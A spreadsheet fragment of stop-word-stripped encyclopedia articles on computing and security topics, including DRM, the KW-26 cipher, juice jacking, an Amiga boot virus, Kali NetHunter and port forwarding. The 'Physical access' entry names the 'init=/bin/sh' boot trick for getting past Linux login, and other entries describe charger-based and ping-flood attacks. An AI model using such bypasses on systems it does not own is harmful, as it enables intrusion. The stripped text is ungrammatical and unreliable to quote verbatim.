criticisms digital rights management schemes, speculation scheme motivated fact would affect official free/open source graphics driver support manufacturers. scheme relies internals graphics cards tell whether hardware trustworthy (permitted play copy-protected content). this could subverted attacker knows certain details hardware's operation, could disclosed hardware documentation open source device drivers. however, affect platform independency, scheme provided charge.microsoft frequently accused adding protected media path feature vista block customers copying rightfully owned media content practice believed protected fair provisions copyright act), feature widely quoted example microsoft's uncompromising adherence drm. these accusations never gained much traction largely vista treats non-drm media exactly previous versions windows, following vista's release change availability free/open source drivers graphics hardware manufacturers. also features windows vista windows vista technologies trusted computing references external links protected media path windows7sins.org</t>
  </si>
  <si>
    <t>KW-26</t>
  </si>
  <si>
    <t>tsec/kw-26, code named romulus, 1966 machine based encryption system code-named "romulus," rather code-name "orion," least army's variant) encryption system used u.s. government and, later, nato countries. developed 1950s national security agency (nsa) secure fixed teleprinter circuits operated hours day. used vacuum tubes magnetic core logic, replacing older systems, like sigaba british 5-uco, used rotors electromechanical relays. kw-26 system (transmitter receiver) contained cores approximately vacuum-tube driver circuits, occupying slightly half standard 19-inch rack. most space rack input power required special-purpose vacuum tube circuits needed provide compatibility multiple input output circuit configurations. military services' requirements numerous modes speeds significantly increased costs delayed delivery. says doubtful three four possible configurations ever used. kw-26 used nsa-developed encryption algorithm based shift registers. algorithm produced continuous stream bits xored five baudot teleprinter code produce ciphertext transmitting plaintext receiving end. terminology, stream bits called key. information needed initialize algorithm, cryptographers today would call key, calls cryptovariable. typically kw-26 given cryptovariable day. designed common fill device (cfd), loading cryptovariable. used remington rand (univac) format punched card columns, round holes). operator inserted daily card closed door securely, locking card place. decks cards created sent courier. cards strictly accounted for. because kw-26 used stream cipher, card ever used twice, encryption could broken. prevent re-use, card automatically half upon reopening cfd. units aged, card reader contacts became less dependable, operators resorted various tricks, hitting card reader cover screwdriver, work properly. card readers cleaned spring loading contacts checked part routine maintenance device. because kw-26 sent continuous stream bits, offered traffic-flow security. someone intercepting ciphertext stream judge many real messages sent, making traffic analysis impossible. problem kw-26 need keep receiver transmitter units synchronized. crystal controlled clock kw-26 capable keeping ends circuit sync many hours, even physical contact lost sending receiving units. this capability made kw-26 ideally suited unreliable radio circuits. however, units sync, card inserted end. benefit traffic-flow security lost time cards inserted. practice, operational protocol cards replaced often desirable maintain maximum security circuit. this especially radio circuits, operators often changed cards many times response loss radio connectivity. case, necessary change cards least prevent cypher pattern repeating. early kw-26 units protected criticomm network, used protect communications circuits used coordinate signals intelligence gathering. initial production order application, awarded burroughs 1957, 1500 units. other services demanded kw-26's 14000 units eventually built, beginning early 1960s, u.s. navy, army, force, defense communications agency, state department cia. provided u.s. allies well. when pueblo captured north korea 1968, kw-26's board. response, modifications made units field, presumably changing crypto algorithm way, perhaps changing shift register feedback taps. starting mid-1980s, kw-26 system decommissioned nsa, replaced advanced solid-state data encryptor, tsec/kg-84. also encryption systems external links kw-26 history page brochure securing record communications: tsec/kw-26</t>
  </si>
  <si>
    <t>Self-destruct</t>
  </si>
  <si>
    <t>self-destruct mechanism cause object destroy render inoperable predefined circumstances occurred. self-destruct mechanisms typically found devices systems malfunction could endanger large numbers people. uses land mines some types modern land mines designed self-destruct, chemically render inert period weeks months reduce likelihood friendly casualties conflict civilian casualties conflict's end. amended protocol convention certain conventional weapons (ccw), amended 1996, requires anti-personnel land mines deactivate self-destruct, sets standards both. landmines currently used united states military designed self-destruct hours days depending upon type. landmines battery battery dies, land mine self-destructs. self-destruct system never failed 67,000 tested landmines variety conditions. self-destruct mechanisms absolutely reliable, landmines laid throughout history equipped self-destruct. landmines also designed self-deactivate, instance battery running charge, deactivation considered different mechanism self-destruction. rocketry space shuttle solid rocket boosters equipped explosive charges boosters could destroyed event control lost launch populated area danger. physically, done detonation cords running along booster. off, open booster's casing. this causes solid rocket fuel burn rapidly exposing large reaction surface, cut-open casing also allows combustion gases escape sideways instead nozzle. therefore, booster longer produces significant thrust. this feature seen videos challenger disaster. after initial disintegration shuttle, solid rocket boosters continued firing exploded simultaneously seconds later. this occurred range safety officer decided separated boosters potential endanger ground activated self-destruct system. military ships another form self-destruct system seen naval procedure scuttling, used destroy ship ships prevent seized and/or reverse engineered. deep-sea drilling form self-destruct system observed deep-sea drilling. event well becoming disconnected rig, dead man's switch trigger activation blowout preventer blind shear ram, cuts drill pipe permanently seals well prevent leak. data storage self-destruct mechanisms sometimes employed prevent apparatus information used unauthorized persons event loss capture. example, found high-security data storage devices (e.g. ironkey), important data destroyed prevent compromise. similarly, online social media platforms equipped stories feature, posted content automatically erased predetermined time, commonly hours. this concept popularized snapchat later adapted instagram youtube. pranking some artworks mechanisms destruct front many eyes watching. example painting love banksy, shredded right million auction sotheby's london october 2018. fiction 1960s television series u.n.c.l.e. mission impossible, sensitive intelligence equipment shown self-destruct order prevent falling enemy hands. notably, usage "self-destruct" verb said coined mission impossible.self-destruct mechanisms frequent plot devices science fiction stories, star trek alien fictional universes. they generally found military installations starships valuable allow enemy capture. many stories, mechanisms obliterate object protected device, cause massive destruction large surrounding area. often, characters limited amount time escape destruction, disable mechanism, creating story tension. cases, artificial intelligence invoke self-destruct cognitive dissonance.usually method required initiate self-destruct sequence lengthy complex, alien, else requires multiple officers aboard ship individual passcodes concur, audible and/or visible countdown timers allow audiences track growing urgency characters' escape. passwords 1970s 1980s movies often clearly insecure purposes self-destruct triggers, considering accounts even low-level security modern times generally complex password requirements (the writers anticipating issues soon raised easy affordability fast computer hardware conducting brute-force attacks). also apoptosis autothysis doomsday device references</t>
  </si>
  <si>
    <t>Juice jacking</t>
  </si>
  <si>
    <t>juice jacking theoretical type compromise devices like phones tablets cable charging data transfer, typically cable. goal attack either install malware device, surreptitiously copy potentially sensitive data. date credible reported cases juice jacking outside research efforts. published research wall sheep, event defcon allowed public access informational juice jacking kiosk year defcon since 2011. their intent bring awareness attack general public. each informational juice jacking kiosks wall sheep village included hidden used notify user plug devices public charging kiosks. first informational juice jacking kiosk included screen would change "free charging station" warning message user "should trust public charging stations devices". researchers designed charging station wall sheep given public presentations showcase malicious acts could taken kiosk, data theft, device tracking information compromising existing charging kiosks.security researcher kyle osborn released attack framework called p2p-adb 2012 utilized on-the-go connect attacker's phone target victim's device. this framework included examples proof concepts would allow attackers unlock locked phones, steal data phone including authentication keys granting attacker access target device owner's google account.security researcher graduates students georgia institute technology (georgia tech) released proof concept malicious tool "mactans" utilized charging port apple mobile devices 2013 blackhat security briefings. they utilized inexpensive hardware components construct small sized malicious wall charger could infect iphone then-current version malicious software charged. software could defeat security measures built mask apple masks background processes ios.security researchers karsten nohl jakob lell srlabs published research badusb 2014 blackhat security briefings. their presentation attack mentions cellphone tablet device charging infected computer would simplest method propagating badusb vulnerability. they include example malicious firmware code would infect android devices badusb.researchers aries security wall sheep later revisited juice jacking concept 2016. they "video jacking" charging station able record mirrored screen phones plugged malicious charging station. affected devices time included android devices supporting slimport protocols usb, well recent iphone using lightning charge cable connector.researchers symantec disclosed findings attack dubbed "trustjacking" 2018 conference. researchers identified user approves access computer device usb, trusted access level also applied devices's itunes accessible wifi. this would allow attackers access device even user unplugged device malicious infected based charge source. researcher goes _mg_ released cable implant dubbed "o.mg cable". o.mg cable micro-controller embedded within cable itself, visual inspection would likely detect difference o.mg cable normal charging cable. o.mg cable allows attackers team penetration testers remotely issue commands cable wifi, commands host computer o.mg cable plugged public warnings popular culture brian krebs first report attack coin term "juice jacking." after seeing informational cell phone charging kiosk wall sheep defcon august 2011, wrote first article security journalism site krebs security. wall sheep researchers—including brian markus, joseph mlodzianowski, robert rowley—designed kiosk information tool bring awareness potential attack vector, discussed, released, tools publicly perform malicious actions charging devices.an episode hacking series hak5 released september 2012 showcased number attacks conducted using attack framework named p2p-adb released kyle osborn. p2p-adb attack framework discussed utilizes phone attack another phone on-the-go connection.in late 2012, document released warning government employees travel threat juice jacking. document reminded readers personal power charging cables overseas travel, charge public kiosks, utilize people's computers charging.the android hackers handbook released march 2014 dedicated sections discussing juice jacking adb-p2p framework.juice jacking central focus episode csi: cyber. season episode "l0m1s" aired april 2015in november 2019, angeles deputy district attorney issued public service announcement warning risks juice jacking upcoming holiday travel season. this came scrutiny fact public cases come light related malicious charging kiosks found public criminal cases tried angeles district attorney's purview time psa. mitigation apple's taken multiple security measures reduce attack surface including longer allowing device automatically mount hard drive plugged usb, well release security patches vulnerabilities exploited mactans.android devices commonly prompt user allowing device mounted hard drive plugged usb. since release 4.2.2, android implemented whitelist verification step prevent attackers accessing android debug bridge without authorization.juice jacking possible device charged trusted adapter, battery backup device, utilizing cable power wires data wires present. similarly, data blocker (sometimes referred condom) connected device charging port disallow data connection. references</t>
  </si>
  <si>
    <t>Lamer Exterminator</t>
  </si>
  <si>
    <t>lamer exterminator computer virus created commodore amiga. first detected germany october 1989. boot block virus contained first 1024 bytes disk. notable first virus known defensive. hooks system examining bootblock return normal result upon replicating also encrypt itself. variants virus known three different decrypt routines defined amiga virus encyclopedia. detection program look known decrypt routines boot block area disk, alternatively blindly brute force decrypt them. first decrypt routine simple every byte takes maximum attempts decrypt. next includes byte decrypt routine, takes maximum 256×256 attempts. third uses words decrypt routine, takes maximum 65535×65535 attempts, makes less practical solve. first versions (and variants decrypt routines), also identified containing identification word 0xabcd, last data boot block containing anything zero values. symptoms overwrites bootblock remains resident (allocating 1024 bytes identifying itself: 'the lamer exterminator !!!') hooks system (remaining reset-resident) destroys media blocks overwriting times string 'lamer!', causing read/write errors affected storage media. this causes filesystem corruption data loss, unrecoverable. references external links detailed virus information information virus amiga virus encyclopedia virus help team</t>
  </si>
  <si>
    <t>Kali NetHunter</t>
  </si>
  <si>
    <t>kali nethunter free open-source mobile penetration testing platform android devices, based kali linux. kali nethunter available un-rooted devices (nethunter rootless), rooted devices standard recovery (nethunter lite), rooted devices custom recovery nethunter specific kernel available (nethunter). official images published offensive security download page updated every quarter. nethunter images custom kernels published popular supported devices, google nexus, samsung galaxy oneplus. many models supported, images published offensive security generated using nethunter build scripts. kali nethunter maintained community volunteers, funded offensive security. background history version released january 2015 added support oneplus devices non-english keyboard layouts attacks.version released 2015 added support nexus android tablets.version released january 2016 major rewrite application, installer, kernel building framework. this version also introduced support devices running android marshmallow.version 2019.2 released 2019 switched kali-rolling kali linux container. adopted kali linux versioning release cycle reflect change. with release, number supported android devices grew 50.version 2019.3 released september 2019 introduced nethunter store default mechanism deploying updating apps.version 2019.4 released december 2019 premiered "kali nethunter desktop experience."before december 2019, kali nethunter available selected android devices. installing kali nethunter required device that: rooted custom recovery kernel built especially kali nethunterin december 2019, "kali nethunter lite" "kali nethunter rootless" editions released allow users devices nethunter specific kernels available, users devices rooted, install kali nethunter reduced functionality.version 2020.1 released january 2020 partitioned nethunter images; nethunter rootless, nethunter lite, nethunter full.version 2020.2 released 2020 supported kernels devices.version 2020.3 released august 2020 added bluetooth arsenal combines bluetooth tools kali nethunter pre-configured workflows exciting cases. external adapter reconnaissance, spoofing, listening injecting audio various devices, including speakers, headsets, watches, even cars.) supported nokia nokia phones.version 2020.4 released november 2020 edited nethunter settings menu, added select different boot animations, persistent magisk. features addition penetration testing tools included desktop kali linux, nethunter also enables wireless 802.11 frame injection, one-click mana evil access points, keyboard functionality (for teensy-like attacks), well badusb man-in-the-middle /(mitm) attacks. nethunter store kali nethunter applications store based fork f-droid telemetry completely removed. store applications (2021). also kali linux offensive security offensive security certified professional references external links kali nethunter documentation</t>
  </si>
  <si>
    <t>ProGuard</t>
  </si>
  <si>
    <t>proguard open source command-line tool shrinks, optimizes obfuscates java code. able optimize bytecode well detect remove unused instructions. proguard free software distributed general public license, version 2.proguard distributed part android runs building application release mode. features bytecode-level optimizations; works java micro edition android; obfuscation proguard obfuscates java android programs renaming classes, fields, methods using meaningless names, making harder reverse-engineer final application. optimization besides removing unused instructions compiled bytecode, proguard optimizes using techniques control flow analysis, data-flow analysis, partial evaluation, static single assignment, global value numbering, liveness analysis.proguard remove many types unused duplicated code, perform peephole optimizations, reduce variable allocation, inline constant short methods, simplify tail recursion calls, remove logging code, among others. also java (programming language) program optimization obfuscation (software) dotfuscator dasho (software) references</t>
  </si>
  <si>
    <t>Security Support Provider Interface</t>
  </si>
  <si>
    <t>security support provider interface (sspi) component windows performs security-related operations authentication. sspi functions common interface several security support providers (ssps): security support provider dynamic-link library (dll) makes security packages available apps. providers following ssps included windows: ntlmssp (msv1_0.dll) introduced windows 3.51. provides ntlm challenge/response authentication windows domains prior windows 2000 systems part domain. kerberos (kerberos.dll) introduced windows 2000 updated windows vista support aes. performs authentication windows domains windows 2000 later. negotiatessp (secur32.dll) introduced windows 2000. provides single sign-on capability, sometimes referred integrated windows authentication (especially context iis). prior windows tries kerberos falling back ntlm. windows later, negoexts introduced, negotiates installed custom ssps supported client server authentication. secure channel (schannel.dll) introduced windows 2000 updated windows vista support stronger encryption this provider uses ssl/tls records encrypt data payloads. tls/ssl public cryptography provides encryption secure communication authenticating clients servers internet. updated windows support 1.2. digest (wdigest.dll) introduced windows provides challenge/response based http sasl authentication windows non-windows systems kerberos available. credssp (credssp.dll) introduced windows vista available windows sp3. provides single sign-on network level authentication remote desktop services. distributed password authentication (dpa, msapsspc.dll) introduced windows 2000. provides internet authentication using digital certificates. public cryptography user-to-user (pku2u, pku2u.dll) introduced windows provides peer-to-peer authentication using digital certificates systems part domain. comparison sspi proprietary variant generic security services application program interface (gssapi) extensions windows-specific data types. shipped windows 3.51 windows ntlmssp. windows 2000, implementation kerberos added, using token formats conforming official protocol standard 1964 (the kerberos gssapi mechanism) providing wire-level interoperability kerberos implementations vendors. tokens generated accepted sspi mostly compatible gss-api sspi client windows able authenticate gss-api server unix depending specific circumstances. significant shortcoming sspi lack channel bindings, makes gssapi interoperability impossible. another fundamental difference ietf-defined gssapi microsoft's sspi concept "impersonation". model, server operate full privileges authenticated client, operating system performs access control checks, e.g. opening files. whether less privileges privileges original service account depends entirely client. traditional (gssapi) model, server runs service account, cannot elevate privileges, perform access control client-specific application-specific fashion. obvious negative security implications impersonation concept prevented windows vista restricting impersonation selected service accounts. impersonation implemented unix/linux model using seteuid related system calls. while means unprivileged process cannot elevate privileges, also means take advantage impersonation process must context root user account. references external links sspi reference msdn sspi information win32 samples example sspi http authentification</t>
  </si>
  <si>
    <t>KOV-14</t>
  </si>
  <si>
    <t>kov-14 fortezza plus national security agency-approved card provides encryption functions storage secure terminal equipment devices. tamper-resistant module based mykotronx krypton chip, including cryptographic functionality original fortezza card plus type algorithms/protocols baton firefly, sdns signature algorithm, stu-iii protocol. developed mykotronx part nsa's missi program. 2008, kov-14 beginning phased replaced backwards compatible ksv-21 card. references</t>
  </si>
  <si>
    <t>Ping (networking utility)</t>
  </si>
  <si>
    <t>ping computer network administration software utility used test reachability host internet protocol (ip) network. available virtually operating systems networking capability, including embedded network administration software. ping measures round-trip time messages sent originating host destination computer echoed back source. name comes active sonar terminology sends pulse sound listens echo detect objects water.ping operates means internet control message protocol (icmp) packets. pinging involves sending icmp echo request target host waiting icmp echo reply. program reports errors, packet loss, statistical summary results, typically including minimum, maximum, mean round-trip times, standard deviation mean. command-line options ping utility output vary numerous implementations. options include size payload, count tests, limits number network hops (ttl) probes traverse, interval requests time wait response. many systems provide companion utility ping6, testing internet protocol version (ipv6) networks, implement icmpv6. history ping utility written mike muuss december 1983 employment ballistic research laboratory, army research laboratory. remark david mills using icmp echo packets network diagnosis measurements prompted muuss create utility troubleshoot network problems. author named sound sonar makes, since methodology analogous sonar's echolocation. backronym packet internet groper ping used years, although muuss says point view ping intended acronym, acknowledged mills' expansion name. first released version public domain software; subsequent versions licensed license. ping first included 4.3bsd. freedos version developed erick engelke licensed gpl. crawford developed reactos version. licensed license.rfc 1122 prescribes host must process icmp echo requests issue echo replies return. invocation example following output running ping linux sending five probes second interval default, configurable option) target host www.example.com: output lists probe message results obtained. finally lists statistics entire test. example, shortest round trip time 9.674 average 10.968 maximum value 11.726 measurement standard deviation 0.748 error indications cases response target host, implementations display either nothing periodically print notifications timing out. possible ping results indicating problem include following: host, network protocol unreachable source route failed fragmentation needed destination network/host unknown source host isolated communication destination network administratively prohibited communication destination host administratively prohibited destination network unreachable destination host unreachable communication administratively prohibited host precedence violation precedence cutoff effectin case error, target host intermediate router sends back icmp error message, example "host unreachable" "ttl exceeded transit". addition, messages include first eight bytes original message case header icmp echo request, including quench value), ping utility match responses originating queries. message format icmp packet generic composition icmp packet: ipv4 header blue): protocol (icmp) type service ipv6 header blue): next header (icmp6) icmp header red): type icmp message bits) code bits) checksum bits), 16-bit one's complement one's complement packet. ipv4, calculated icmp message starting type field (the header included). ipv6 calculated icmp message, prepended ipv6 "pseudo-header". header data bits) field, case (icmp echo request replies), composed identifier bits) sequence number bits). icmp payload: payload different kind answers; arbitrary length, left implementation detail. however, packet including icmp headers must less maximum transmission unit network risk fragmented. echo request echo request ("ping") icmp/icmp6 message. identifier sequence number used client match reply request caused reply. practice, linux systems unique identifier every ping process, sequence number increasing number within process. windows uses fixed identifier, varies windows versions, sequence number reset boot time. echo reply echo reply icmp message generated response echo request; mandatory hosts, must include exact payload received request. identifier sequence number used client associate echo request reply. payload payload packet generally filled ascii characters, output tcpdump utility shows last bytes following example (after eight-byte icmp header starting 0x0800): payload include timestamp indicating time transmission sequence number, found example. this allows ping compute round trip time stateless manner without needing record time transmission packet. payload also include magic packet wake-on-lan protocol, minimum payload case longer shown. echo request typically receive reply host sleeping hibernation state, host still wakes sleep state interface configured accept wakeup requests. host already active configured allow replies incoming icmp echo request packets, returned reply include payload. this used detect remote host effectively woken repeating request delay allow host resume network services. host sleeping power active state, single request wakes host enough allow echo reply service reply instantly service enabled. host need completely wake devices, return power mode short delay. such configuration used avoid host enter hibernation state, much longer wake delay, time passed power active mode. security loopholes conduct denial-of-service attack, attacker send ping requests fast possible, possibly overwhelming victim icmp echo requests. this technique called ping flood.ping requests multiple addresses, ping sweeps, used obtain list hosts network. also references further reading dyson, peter (1995). mastering os/2 warp. sybex. isbn 978-0782116632. john paul mueller (2007). windows administration command line windows vista, windows 2003, windows windows 2000. john wiley sons. isbn 978-0470165799. mcelhearn, kirk (2006). command line: unix under hood. john wiley sons. isbn 978-0470113851. external links ping(1m) solaris system administration commands reference manual ping(8) freebsd system manager's manual ping(8) linux programmer's manual administration privileged commands ping microsoft docs</t>
  </si>
  <si>
    <t>Key-recovery attack</t>
  </si>
  <si>
    <t>key-recovery attack adversary's attempt recover cryptographic encryption scheme. normally means attacker pair, pair, plaintext message corresponding ciphertext.: historically, cryptanalysis block ciphers focused key-recovery, security sorts attacks weak guarantee since necessary recover obtain partial information message decrypt message entirely.: modern cryptography uses robust notions security. recently, indistinguishability adaptive chosen-ciphertext attack (ind-cca2 security) become "golden standard" security.: obvious key-recovery attack exhaustive key-search attack. modern ciphers often space size {\displaystyle 2^{128}} greater, making attacks infeasible current technology. advantage cryptography, key-recovery advantage advantage) particular algorithm measure effective algorithm mount key-recovery attack. consequently, maximum key-recovery advantage attainable algorithm fixed amount computational resources measure difficult recover cipher's key. defined probability adversary algorithm guess cipher's randomly selected key, given fixed amount computational resources. extremely advantage essential encryption scheme's security. references external links cseweb.ucsd.edu paper lecture notes cryptography</t>
  </si>
  <si>
    <t>KYK-13</t>
  </si>
  <si>
    <t>kyk-13 electronic transfer device common fill device designed united states national security agency transfer loading cryptographic keys corresponding check word. kyk-13 battery powered uses ds-102 protocol transfer. national stock number 5810-01-026-9618. even though kyk-13 first introduced 1976 supposed obsoleted an/cyz-10 data transfer device, still widely used simplicity reliability. simpler device cyz-10, kik-30 "really simple loader" (raskl) planned replace kyk-13s, $200 million budgeted procure quantity. components connectors electrically connection. used connect fill cable, comsec device, koi-18, kyx-15, another kyk-13, an/cyz-10. battery compartment holds battery powers kyk-13. mode switch three position rotary switch used select operation modes. used zeroize selected keys. used fill transfer keys. check used conduct parity checks. parity lamp blinks parity checked fill transferred. initiate push button push button loading zeroizing kyk-13. address select switch seven position rotary switch. zeroizes storage registers mode switch "z". through storage registers storing keys kyk-13. references</t>
  </si>
  <si>
    <t>Key2Audio</t>
  </si>
  <si>
    <t>key2audio copy restriction system audio cds, developed sony dadc. system gained notoriety discovered effectively disable system tracing outer edge felt-tip marker.the system works applying bogus data track onto disc glass master manufacturing. since computers designed read data music, prevents playback thereby prevents ripping well ordinary listening using computer. players ignore non-audio tracks disc, therefore play unimpeded enhanced also take advantage factor. currently major versions key2audio protection: original key2audio, key2audioxs. key2audio key2audio products highly compatible audio session modified. since additional data sessions used, book compliant "compact disc" logo. passive technology players unable play non-standard disc. since optical computer cd/dvd drives also capable reading book audio cds, player manufacturers cd/dvd drives instead specialized audio video drives order reduce costs. players stereo systems seem problems incompatibilities key2audio protected cds. protected still achieves maximum recording time minutes supports full isrc, cd-text capabilities. early versions copy protection infamous easily circumvented marker pen, drawing circle visible edge audio data. technical background appears key2audio protected disc contains three sessions written disc. contain small data tracks, contains audio tracks. regular players pick audio tracks outright, computer players confused corrupted information. players drives support multisession discs immune confusion. worked around e.g. clonecd exact audio copy. key2audioxs key2audioxs combines playback clone-proof multimedia session cd-extra links. version protection allows listener right play allows controlled burning audio this solution allows consumers limited amount private copies. record labels individually define burn count. these copies also fully protected offer efficiency compatibility original disc. audio sessions encoded windows media audio drm-protected files, portable devices supported online distribution prevented. furthermore, key2audioxs user pick send audio tracks email. with usability period defined record label, users share music, facilitating promotion activities labels. additionally, discs feature "n-cd", lets user access bonus features videos, ringtones, lotteries like. original n-cd unique reserved owners. purpose, user interface key2audio allows navigation includes copying burning tool, well additional content bonus pictures lyrics. audio part hold minutes. notes external links key2audio explained fear</t>
  </si>
  <si>
    <t>Sendfile</t>
  </si>
  <si>
    <t>computing, sendfile command found number contexts relating data transmission: sendfile (unix), push-based asynchronous file transfer, regardless whether local remote, using simple asynchronous file transfer (saft), internet protocol bound port sendfile (ibm vm), command transfer file asynchronously vm/cms user another, regardless whether local remote sendfile (system call), system call. command within instant messaging application. notes</t>
  </si>
  <si>
    <t>Physical access</t>
  </si>
  <si>
    <t>physical access term computer security refers ability people physically gain access computer system. according gregory white, "given physical access office, knowledgeable attacker quickly able find information needed gain access organization's computer systems network." attacks countermeasures attacks physical access opens variety avenues hacking. michael meyers notes "the best network software security measures rendered useless fail physically protect systems," since intruder could simply walk server crack password leisure. physical access also allows hardware keyloggers installed. intruder able boot external media read unencrypted data hard drive. they also exploit lack access control boot loader; instance, pressing certain versions microsoft windows booting, specifying 'init=/bin/sh' boot parameter linux (usually done editing command line grub), etc. could also rogue device access poorly secured wireless network; signal sufficiently strong, might even need breach perimeter. countermeasures security standards united states typically call physical access limited locked server rooms, sign-in sheets, etc. physical access systems security systems historically administered separate departments organizations, increasingly seen interdependent functions needing single, converged security policy. department could, instance, check security entries suspicious logons occurring business hours, keycard swipe records building access control system narrow list suspects building time. surveillance cameras might also used deter detect unauthorized access. references</t>
  </si>
  <si>
    <t>LatencyTOP</t>
  </si>
  <si>
    <t>latencytop linux application identifying operating system latency within kernel find operations/actions cause latency. latencytop tool software developers visualize system latencies. based observations, source code application kernel modified reduce latency. released intel 2008 gplv2 license. works intel, processors.the project appears dead website gone commits since 2009. also green computing powertop (software) references external links latencytop site (via internet archive) tree</t>
  </si>
  <si>
    <t>KeyKOS</t>
  </si>
  <si>
    <t>keykos persistent, pure capability-based operating system s/370 mainframe computers. allows emulating environments mvs, portable operating system interface (posix). predecessor extremely reliable operating system (eros), successor operating systems, capros, coyotos. keykos nanokernel-based operating system.in mid-1970s, development keykos began tymshare, inc., name gnosis. 1984, mcdonnell douglas (md) bought tymshare. year later spun logic, bought gnosis renamed keykos. references external links official website, norman hardy gnosis: prototype operating system 1990s, 1979 paper, tymshare inc. keykos secure, high-performance environment s/370, 1988 paper, logic, inc.</t>
  </si>
  <si>
    <t>Port forwarding</t>
  </si>
  <si>
    <t>computer networking, port forwarding port mapping application network address translation (nat) redirects communication request address port number combination another packets traversing network gateway, router firewall. this technique commonly used make services host residing protected masqueraded (internal) network available hosts opposite side gateway (external network), remapping destination address port number communication internal host. purpose port forwarding allows remote computers (for example, computers internet) connect specific computer service within private local-area network (lan).in typical residential network, nodes obtain internet access cable modem connected router network address translator (nat/napt). hosts private network connected ethernet switch communicate wireless lan. device's external interface configured public address. computers behind router, hand, invisible hosts internet communicate private address. when configuring port forwarding, network administrator sets aside port number gateway exclusive communicating service private network, located specific host. external hosts must know port number address gateway communicate network-internal service. often, port numbers well-known internet services, port number services (http), used port forwarding, common internet services implemented hosts within private networks. typical applications include following: running public http server within private permitting secure shell access host private internet permitting access host private internet running publicly available game server within private lanadministrators configure port forwarding gateway's operating system. linux kernels, achieved packet filter rules iptables netfilter kernel components. macos operating systems prior yosemite 10.10.x) implement ipfirewall (ipfw) module macos operating systems beginning yosemite implement packet filter (pf) module. when used gateway devices, port forward implemented single rule translate destination address port. linux kernels, dnat rule). source address port are, case, left unchanged. when used machines default gateway network, source address must changed address translating machine, packets bypass translator connection fail. when port forward implemented proxy process (such application layer firewalls, socks based firewalls, circuit proxies), packets actually translated, data proxied. this usually results source address (and port number) changed proxy machine. usually private hosts specific forwarded port time, configuration sometimes possible differentiate access originating host's source address. unix-like operating systems sometimes port forwarding port numbers smaller 1024 created software running root user. running superuser privileges order bind port) security risk host, therefore port forwarding used redirect low-numbered port another high-numbered port, application software execute common operating system user reduced privileges. universal plug play protocol (upnp) provides feature automatically install instances port forwarding residential internet gateways. upnp defines internet gateway device protocol (igd) network service internet gateway advertises presence private network simple service discovery protocol (ssdp). application provides internet-based service discover gateways upnp protocol reserve port number gateway cause gateway forward packets listening socket. types port forwarding port forwarding divided following specific types: local, remote, dynamic port forwarding. local port forwarding local port forwarding common type port forwarding. used user connect local computer another server, i.e. forward data securely another client application running computer secure shell (ssh) client. using local port forwarding, firewalls block certain pages able bypassed.connections client forwarded, server, intended destination server. server configured redirect data specified port (which local host runs client) secure tunnel specified destination host port. local port computer client, port "forwarded port". computer, client wants connect destination host port configured connect forwarded port (rather directly destination host port). after connection established, client listens forwarded port directs data sent applications port, secure tunnel server. server decrypts data, redirects destination host port.on command line, “-l” specifies local port forwarding. destination server, port numbers need included. port numbers less 1024 greater 49150 reserved system. some programs work specific source ports, part source port number used. some uses local port forwarding: using local port forwarding receive mail connect laptop website using tunnel. remote port forwarding this form port forwarding enables applications server side secure shell (ssh) connection access services residing ssh's client side. addition ssh, proprietary tunnelling schemes utilize remote port forwarding general purpose. words, remote port forwarding lets users connect server side tunnel, another, remote network service located tunnel's client side. remote port forwarding, address destination server tunnel's client side) port numbers must known. port numbers chosen depend application used. remote port forwarding allows computers access applications hosted remote servers. examples: employee company hosts server home wants give access service employees using computers workplace. order this, employee remote port forwarding company's internal computers including server’s address using correct port numbers (standard port tcp/21) opening remote desktop sessions common remote port forwarding. through ssh, accomplished opening virtual network computing port (5900) including destination computer’s address. dynamic port forwarding dynamic port forwarding (dpf) on-demand method traversing firewall firewall pinholes. goal enable clients connect securely trusted server acts intermediary purpose sending/receiving data many destination servers.dpf implemented setting local application, ssh, socks proxy server, used process data transmissions network internet. programs, browsers, must configured individually direct traffic proxy, acts secure tunnel another server. once proxy longer needed, programs must reconfigured original settings. because manual requirements dpf, often used.once connection established, used provide additional security user connected untrusted network. since data must pass secure tunnel another server forwarded original destination, user protected packet sniffing occur lan.dpf powerful tool many uses; example, user connected internet coffee shop, hotel, otherwise minimally secure network wish protecting data. also used bypass firewalls restrict access outside websites, corporate networks. also firewall pinhole traversal packet forwarding port address translation (pat) port triggering helper address secure shell references external links alan stafford. "warp speed access: sharing bandwidth". world. archived original 2008-03-18. retrieved 2008-10-11. using upnp programmatic port forwardings traversal free software uses upnp internet gateway device protocol (igd) automate port forwarding forwarding source code source code explaining/poc forwarding. open.nat lightweight easy-to-use .net class library allow port forwarding devices support upnp pmp.</t>
  </si>
  <si>
    <t>Proton (software)</t>
  </si>
  <si>
    <t>proton compatibility layer microsoft windows games linux-based operating systems. proton developed valve cooperation developers codeweavers. collection software libraries combined patched version wine improve performance compatibility windows games. proton designed integration steam client "steam play". officially distributed client, although third party forks manually installed. overview proton initially released august 2018. upon release, valve announced whitelist games tested certified perform like native windows counterparts without requiring end-user tweaking. these include doom (2016), quake, final fantasy vi.proton incorporates several libraries improve performance. these include direct3d-to-vulkan translation layers, namely dxvk direct3d vkd3d-proton direct3d separate library known d9vk handled direct3d support merged dxvk december 2019. compatibility being fork wine, proton maintains similar compatibility windows applications upstream counterpart. addition official whitelist, many windows games reportedly compatible, albeit unofficially, proton. user optionally force proton specific title, even linux version already exists. protondb protondb unofficial community website collects displays crowdsourced data describing compatibility given title proton, rating scale "borked" "platinum". site inspired winehq appdb, also collects displays crowdsourced compatibility reports uses similar rating system. release history valve released seven major versions proton. versioning scheme refers upstream wine version based appended patch number.proton generally lags behind upstream wine base several releases. unofficial forks, proton created re-base proton recent wine versions, improve compatibility games official release, sometimes hurt it.in december 2020, valve released proton experimental, perpetual beta branch proton incorporates features fixes quicker regular releases, eventually included regular release.the steam deck uses proton increase software title compatibility. also steamos steam deck references external links protondb community database game compatibility data</t>
  </si>
  <si>
    <t>Popek and Goldberg virtualization requirements</t>
  </si>
  <si>
